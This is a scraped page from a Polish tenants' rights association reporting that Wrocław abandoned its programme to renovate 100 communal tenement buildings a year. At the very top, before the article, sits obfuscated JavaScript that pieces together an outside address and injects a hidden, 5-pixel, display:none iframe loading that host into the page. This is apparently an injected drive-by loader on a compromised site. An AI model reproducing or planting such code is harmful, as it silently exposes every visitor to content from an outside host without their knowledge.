jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); NIE MA JUŻ WROCŁAWSKIEGO PROGRAMU REMONTU 100 KAMIENIC

Urzędnicy wycofali się z programu "100 kamienic" - czyli remontów setki budynków komunalnych rocznie.Ten program ruszył hucznie wiosną 2007 r i po pięciu latach okazało się, że gminie udało się odnowić w sumie... 127 obiektów. Więcej

 

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.